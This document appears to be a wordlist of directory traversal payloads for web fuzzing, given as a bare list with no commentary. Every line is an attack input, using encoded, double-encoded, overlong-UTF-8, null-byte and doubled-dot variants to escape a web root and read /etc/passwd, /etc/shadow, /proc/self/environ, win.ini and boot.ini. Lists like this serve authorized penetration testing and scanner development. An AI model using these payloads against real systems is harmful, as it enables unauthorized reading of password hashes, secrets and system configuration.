../../../../../../../../etc/passwd
..\\..\\..\\..\\..\\..\\etc\\passwd
/../../../../../../etc/passwd
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%5c..%5c..%5c..%5c..%5cetc%5cpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\windows\\system.ini
..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\boot.ini
%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\windows\\win.ini
%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\boot.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e\\%252e%252e\\%252e%252e\\windows\\win.ini
..%c0%af..%c0%afetc%c0%afpasswd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
../../../../../../etc/passwd%00
....//....//....//etc/passwd
....\\....\\....\\windows\\win.ini
/%2e%2e/%2e%2e/%2e%2e/etc/passwd
../../../../../../etc/shadow
../../../../../../etc/hosts
../../../../../../etc/httpd/httpd.conf
..\..\..\..\..\..\Windows\System32\drivers\etc\hosts
../../../../../../proc/self/environ
..\..\..\..\..\..\proc\self\environ
%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron
